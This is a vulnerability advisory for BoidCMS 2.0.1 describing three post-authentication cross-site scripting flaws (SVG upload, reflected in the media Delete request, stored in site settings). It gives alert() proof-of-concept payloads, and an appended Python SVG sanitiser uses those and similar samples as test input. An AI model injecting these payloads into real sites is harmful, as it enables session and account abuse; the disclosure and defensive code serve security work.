BoidCMS 2.0.1 Cross Site Scripting
BoidCMS version 2.0.1 suffers from multiple cross site scripting vulnerabilities: an XSS via SVG file upload, a reflected XSS in the media "Delete" request, and a stored XSS in the site settings. Original discovery of cross site scripting in this version is attributed to Rahad Chowdhury in December 2023; this advisory provides additional vectors of attack. All three issues are post-authentication: every reproduction below starts with an administrator login.
# Exploit Title: Multiple XSS Issues in BoidCMS v2.0.1
# Date: 3/2024
# Exploit Author: Andrey Stoykov
# Version: 2.0.1
# Tested on: Ubuntu 22.04
# Blog: http://msecureltd.blogspot.com

XSS via SVG File Upload

Steps to Reproduce:
1. Login with admin user
2. Visit "Media" page
3. Upload xss.svg
4. Click "View" and the XSS payload will execute (the file is opened inline as a document, so its <script> runs in the site's origin)

// xss.svg contents
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(`XSS`);
  </script>
</svg>

Reflected XSS

Steps to Reproduce:
1. Login as admin
2. Visit "Media" page
3. Click "Delete" and intercept the HTTP GET request
4. In the "file" parameter add the payload "<script>alert(1)</script>"
5. After forwarding the HTTP GET request a browser popup will surface

Stored XSS

Steps to Reproduce:
1. Login as admin
2. Visit "Settings" page
3. Enter the XSS payload in "Title", "Subtitle" and "Footer"
4. Then visit the blog page and the stored payload executes
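The SVG vector works because the "View" link serves the uploaded file inline as a document, where its <script> element runs in the site's origin. As an added example (not BoidCMS code and not part of the original advisory), the Python below does the server-side check a media-upload handler should do before accepting an SVG: it parses the file and reports active content (script and foreign-content elements, on* event handlers, javascript:/data: hrefs), and it shows the response headers that keep an SVG from running script even if it is served. The xss.svg sample is the advisory's own payload; the benign, onload and href samples, and the function names, are constructed for illustration.

```python
"""Server-side check for the SVG upload vector: reject or quarantine SVG files
that carry active content before they can be opened inline via a "View" link.
Added example, not BoidCMS code. The samples below are constructed."""
import re
import xml.etree.ElementTree as ET

# Elements that execute script or embed foreign/arbitrary content when an SVG
# is rendered as a document (as opposed to being referenced from <img>).
DANGEROUS_TAGS = {"script", "foreignobject", "iframe", "embed", "object"}
# href / xlink:href values with these schemes run code or smuggle content.
BAD_SCHEME = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.IGNORECASE)


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1].lower()


def svg_findings(data: bytes) -> list[str]:
    """Return the reasons an SVG is unsafe to serve inline; [] means clean.

    expat does not fetch external DTDs, so the DOCTYPE in the advisory's
    payload is harmless to parse here; do not swap in a resolver that does.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    findings = []
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        tag = _local(el.tag)
        if tag in DANGEROUS_TAGS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                findings.append(f"event handler {name}= on <{tag}>")
            elif name == "href" and BAD_SCHEME.match(value):
                findings.append(f"{name}={value!r} on <{tag}>")
    return findings


def inline_view_headers(filename: str) -> dict[str, str]:
    """Headers for serving a media file from a "View" link so that an SVG
    which slipped past the check still cannot run script in the site's origin."""
    safe_name = re.sub(r"[^\w.\-]", "_", filename)  # keep header injection out
    return {
        "Content-Type": "image/svg+xml",
        "X-Content-Type-Options": "nosniff",
        # Download instead of rendering: browsers do not execute attachments.
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        # Belt and braces if the file is ever rendered inline anyway.
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
    }


# The advisory's xss.svg payload, as bytes.
XSS_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(`XSS`);
  </script>
</svg>"""

# Constructed benign sample: the same triangle, no script.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">
  <polygon points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>"""

# Constructed variants that avoid a <script> element entirely.
HANDLER_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>'
HREF_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
            b'<a xlink:href="javascript:alert(1)"><text y="20">click</text></a></svg>')

if __name__ == "__main__":
    for label, blob in [("xss.svg", XSS_SVG), ("benign.svg", BENIGN_SVG),
                        ("onload.svg", HANDLER_SVG), ("href.svg", HREF_SVG)]:
        print(label, "->", svg_findings(blob) or "clean")
```

A check like this belongs on the upload path, not only on the "View" path: the reflected and stored issues in this advisory show that output encoding is missing elsewhere too, so an SVG stored on disk will eventually be served by something that does not add the headers above. The header set is the fallback, the upload-time rejection is the fix.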